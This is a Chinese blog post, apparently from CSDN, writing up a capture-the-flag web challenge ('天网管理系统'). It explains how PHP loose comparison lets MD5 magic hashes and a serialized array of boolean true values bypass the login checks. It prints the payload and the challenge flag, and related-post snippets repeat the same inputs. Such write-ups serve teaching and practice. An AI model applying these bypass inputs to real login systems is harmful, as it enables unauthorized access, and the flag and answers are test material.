实验吧 天网管理系统

最新推荐文章于 2020-10-31 21:43:10 发布
最新推荐文章于 2020-10-31 21:43:10 发布
阅读量399 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 实验吧 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44481102/article/details/88862120
本文介绍了CTF中的一道题目,涉及天网管理系统的用户验证。题目要求输入的用户名MD5加密后等于0,通过搜索发现多个字符串MD5值为0。进一步分析源代码,揭示了PHP的布尔类型弱类型比较漏洞,通过构造特定的password实现反序列化,从而获取flag:ctf{dwduwkhduw5465}。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:http://ctf5.shiyanbar.com/10/web1/在这里插入图片描述

  1. 查看源代码在这里插入图片描述
    要求输入的用户名的值md5之后等于0 百度下就能知道很多md5为0的值
    MD5加密后==’0’ 总结
  2. 找到新链接
    在这里插入图片描述
$unserialize_str = $_POST['password']; 
$data_unserialize = unserialize($unserialize_str); 
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') 
{
	 print_r($flag);
 }
 伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年 
 // 将上传的password反序列化反序列化中的user, pass等于某个值
  1. php序列化
    PHP serialize() 函数函数用于序列化对象或数组,并返回一个字符串 函数序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。如果想要将已序列化的字符串变回 PHP 的值,可使用 unserialize()
    在这里插入图片描述
<?php
class Students
{
	public $name = "Jack";
	public $sex = "male";
	public $age = "18";
}
$c = new Students();
$c -> name = "Alice";
$c -> sex = "female";
$c -> age = "16";
echo serialize($c);
?>

在这里插入图片描述

  1. 反序列化漏洞
    前面源代码中有提到布尔型变量 bool类型的true跟任意字符串可以弱类型相等
    构造password a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
    在这里插入图片描述
    得到flag:ctf{dwduwkhduw5465}
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
实验三:Windows7操作系统安全
weixin_46544151的博客
04-18 2905
一、实验目的及要求 了解Windows账户与密码的安全策略设置,掌握用户和用户组的权限管理、审核,以及日志的启用,并学会使用安全模版来分析配置计算机。 二、实验原理 Windows系列是目前世界上使用用户最多的桌面操作系统。由于历史原因,Windows的很多用户都直接以管理员权限运行系统,对计算机安全构成很大隐患。从Windows Vista开始,Windows加强了用户账户控制的管理,使用“用户账户控制”(User Account Control,UAC)模块来管理和限制用户权限。UAC体现了最小特
暑期练习web3:天网管理系统实验吧)
qq_41618162的博客
07-31 849
我们首先打开题目,随便试试发现没有任何反应 我们查看一下源码 &lt;html&gt; &lt;head&gt; &lt;meta charset=utf8&gt; &lt;title&gt;最安全的管理系统&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;h1&gt;天网管理系统&lt;/h1&gt; &l
实验吧-天网管理系统php弱类型==与===的利用】
Sp4rkW的博客
08-07 4305
首先打开网页,查看源代码: 很明显有一行备注是给我们看的, &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; 这很明显是个php弱类型问题,md5加密等于0,详情见我的博客【php弱口令总结】略过 将username替换之后bp可得如下代码: 很明显,这是告诉我们去访问一个新...
实验吧-天网管理系统
苟有恒,必有三更眠,五更起。
08-07 346
天网管理系统 原题链接 http://ctf5.shiyanbar.com/10/web1/ 分析 查看源码 &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; easy username=QNKCDZO 页面结果 /user.php?fame=hjkleffi...
实验吧-web-天网管理系统
a3uRa的一个窝
08-13 521
这个题一共有两关 第一关 &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; 很简单 第二关,涉及到php反序列化的知识了,正好最近在看 网上的wp大都没有给出最后的payload:a:2:{s:4:”user”;b:1;s:4:”pass”;b:1;} 如何来的 &lt;?php...
天网管理系统-实验
Xi4or0uji
05-14 635
进去页面看源码看见有这样一句也就是说,username有个md5函数漏洞,可以用QNKCDZO绕过绕过以后返回访问一下就看见$unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); if($data_unserialize['user'] == '???' &a...
实验天网管理系统Writeup
驻足
05-01 1723
实验天网管理系统Writeup 原题地址 实验吧–天网管理系统 用到的知识点: 1.php弱类型相等 2.php函数serialize()与unserialize()(序列化和反序列化) 首先查看源文件,发现提示: &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; 意思就是将输入的...
天网防火墙
11-13
它根据系统管理者设定的安全规则(Security Rules)把守网络,提供强大的访问控制、应用选通、信息过滤等功能。它可以帮你抵挡网络入侵和攻击,防止信息泄露,保障用户机器的网络安全。天网防火墙把网络分为本地网和...
实验吧-Web-天网管理系统
烟雨天青色
11-25 1440
点开解题链接,会出现一个如下页面: 乍一看,真好!用户名,密码都给填上了,可是。。。。点击“登入系统”。。。咦~没反应!没反应!!!好吧,F12查看网页源代码 发现问题了。。。 我们看到注释里面有一个提示,当传入的username值经md5加密后等于0,就会返回某样东西。 在某些情况下,PHP会把类数值数据(如含有数字的字符串等)转换成数值处理,== 运算符就是其中之一。在使用...
实验吧Web-天网管理系统
abg49988的博客
09-17 124
笔记 == :  比较运算符号 不会检查条件式的表达式的类型 ===:恒等计算符 , 同时检查表达式的值与类型。(会检查表达式类型,如bool) PHP序列化与反序列化serialize() 对输入的数据进行序列化转换unserialize() 恢复原先变量,还原已经序列化的对象。 关于php序列化与反序列化,可以参考:http://www.111cn.net/ph...
实验吧--天网管理系统
qq_41281571的博客
07-30 701
天网管理系统 关于php的弱类型漏洞:在php中,定义变量之前没有像其他语言一样要求我们先说明该变量的类型。在他这里,无论你是字符,数字,数组都是直接$+变量名,那么怎么判断两个变量是否相等呢?在php中的==运算符下,会把类数值型数据(如含有数字的字符串)转换成数字处理。比说在数字与字符串作比较时: 3=="3aasda" 结果竟然是true,也解释说他会把字符串的第一个非数字字符前的...
CTF 实验天网管理系统
The Road Of Sec
10-18 4541
1. 点击登入系统,并没有反应 2.直接F12 查看源码 3.发现异常 有一段代码:    要求用户名传入一个字符串,经过md5加密后要等于0。    md5加密自行百度就可得知 4.插播一段有关于 PHP弱类型的相关知识   在php中 == :  比较运算符号  不会检查条件式的表达式的类型 ===:  恒等计算符 , 同时检查表达式的值与类型。(会检查表达式类型,如bo
实验吧web天网管理系统
whyrookie的博客
09-01 149
直接查看源码 <!--$test=$_GET['username']>这一行 源码的下面给了我们一些提示:我们输入的username经过md5加密后会赋值给test。当test为0时就会跳出新的东西,这时候我们就要构思,如何才能让test为0? 显然将0提前md5解密是不行的,而在php中==是只进行值的比较,不管二者的类型。当两个字符串进行==比较的时候,PHP会把类数值的字符串转换为数值进行比较,如果参数是字符串,则返回字符串中第一个不是数字的字符之前的数字串所代表的...
天网管理系统
weixin_30245867的博客
07-19 265
点击登录发现没用 然后康康源码 给出提示test使用的是md5加密,如果id为0就。。。。 这里使用php中==的漏洞,==只比较值的大小并不会比较数据类型 所以这里使用md5(0)的相等值240610708输入到username中 弹出提示 似乎是网页的后缀,加进去试试 似乎让我们用布尔? 这段代码的大概意思是取得password的值,再使用unserial...
实验吧WEBWP(一)
Yale的博客
03-19 2768
1.Forms(链接:http://www.shiyanbar.com/ctf/1819) 页面很干净,第一反应查看源码 在此之前,我们先随便输入然后点击enter,没什么线索 源码中我们看到value=0 将value改为1,再随便输入然后点击enter 毫无疑问,输入的内容就应该是a的值 得到flag2.天网管理系统(http://www.shiyanbar.com/ctf/
人脸识别与天网系统
python__reported的博客
10-31 2312
人脸识别与天网系统一、结果二、识别库三、实现代码 一、结果 识别对象 第一个是名字,第二个是百度上的内容 二、识别库 face_recognition 三、实现代码 class Face_recognition(): def __init__(self,pic,pics): self.pic = pic self.pics = pics self.name = "" def face_know(self,file): known_image = face_recogni
天网管理系统(反序列化问题)
Gunther的博客
08-28 3575
http://www.shiyanbar.com/ctf/1810 天网管理系统 天网你敢来挑战嘛 格式:ctf{ } 解题链接: http://ctf5.shiyanbar.com/10/web1/ 查看源码如下: 最安全的管理系统 天网管理系统 安全与你同在 账户:admin  密码:admin 就是这么光明正大的放置用户名和密码,爸爸说我们再也不会忘记密
大数据与信息安全(六)天网系统与大数据 大数据
cqacrh2798的博客
10-21 1682
大数据与信息安全(六) 大数据是什么?大数据是一个极为强大的信息数据的采集和收录系统,可以将我们日常工作生活中的所有数据,近乎可以全盘收录。大数据系统的设立,就是为了便统计,不需要过去繁琐的操作,通过什么个体采样、分批采样等统计模式来获取信息数据,而是将所能采集到的数据,都通过大数据系统近乎完全彻底的收录进来,然后通过云计算来进行数据的分析处理,最后得出相应结论。大数据和云计算得出的结论...
北大天网搜索引擎技术详解:原理、实现与系统构建
通过理论分析和实验数据的结合,本书不仅适合计算机科学与技术、信息管理与信息系统、电子商务等专业研究生的学习,也为网络技术、Web站点管理、数字图书馆和Web挖掘领域的科研人员提供了宝贵的参考资料。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值